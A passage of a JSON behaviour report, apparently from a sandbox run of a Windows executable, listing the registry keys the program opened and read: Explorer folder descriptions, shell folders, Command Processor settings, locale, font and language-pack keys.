"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PropertyBag", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PropertyBag", "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DisableUNCCheck", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\EnableExtensions", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DelayedExpansion", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DefaultColor", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\CompletionChar", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\PathCompletionChar", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\AutoRun", "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableUmpdBufferSizeCheck", "HKEY_CURRENT_USER\\Software\\Borland\\Locales", "HKEY_LOCAL_MACHINE\\Software\\Borland\\Locales", "HKEY_CURRENT_USER\\Software\\Borland\\Delphi\\Locales", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Shell Dlg 2", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\AssemblyStorageRoots", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Tahoma", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\MS Sans Serif", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\f1e62c0e7345fc825586.exe", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Sans Serif", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Segoe UI" ], "read_keys": [ "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InitFolderHandler", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\InitFolderHandler", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DisableUNCCheck", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\EnableExtensions", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DelayedExpansion", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DefaultColor", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\CompletionChar", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\PathCompletionChar", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\AutoRun", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows 